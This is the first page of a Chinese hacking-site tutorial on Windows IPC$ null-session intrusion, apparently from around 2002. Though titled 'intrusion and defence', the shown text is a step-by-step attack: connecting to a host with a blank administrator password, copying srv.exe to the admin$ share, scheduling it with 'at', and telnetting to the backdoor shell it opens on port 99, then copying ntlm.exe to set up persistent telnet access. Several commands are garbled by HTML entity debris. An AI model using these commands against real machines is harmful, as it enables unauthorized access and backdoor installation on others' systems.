黑客基础教程：IPC$空连接的入侵和防御

• 　　相关命令

  　　建立空连接　　net use $Content$nbsp">\\IP\ipc$Content$nbsp;"" /user:""
                                    (一定要注意:这一行命令中包含了3个空格)

  　　建立非空连接　　net use $Content$nbsp">\\IP\ipc$Content$nbsp;"用户名" /user:"密码" (同样有3个空格)

  　　映射默认共享　　　　net use z: $Content$nbsp">\\IP\c$Content$nbsp;"密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

  　　如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: $">\\IP\c$

  　　删除一个ipc$连接　　net use $Content$nbsp;/del">\\IP\ipc$Content$nbsp;/del

  　　删除共享映射　　net use c: /del 删除映射的c盘，其他盘类推

  　　net use * /del 删除全部,会有提示要求按y确认

  　　经典入侵模式

  　　1.C:\>net use $Content$nbsp">\\127.0.0.1\IPC$Content$nbsp;"" /user:"admintitrators"

  　　这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

  　　2. C:\>copy srv.exe $Content$nbsp">\\127.0.0.1\admin$Content$nbsp;

  　　先复制srv.exe上去，在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了)。

  　　3.C:\>net time \\127.0.0.1

  　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

  　　4.C:\>at \\127.0.0.1 11:05 srv.exe

  　　用at命令启动srv.exe吧(这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵!)

  　　5.C:\>net time \\127.0.0.1

  　　再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

  　　6.C:\>telnet 127.0.0.1 99

  　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

  　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

  　　7.C:\>copy ntlm.exe $Content$nbsp">\\127.0.0.1\admin$Content$nbsp;

• [1] [2] [3] [4] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 黑客基础教程：IPC$空连接的入侵和防御 相关文章：
• ·黑客基础教程：IPC$空连接的入侵和防御
• 黑客基础教程：IPC$空连接的入侵和防御 相关软件

上一篇:活用Ftp自动上传文件至肉鸡

下一篇:动网论坛银行插件漏洞

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐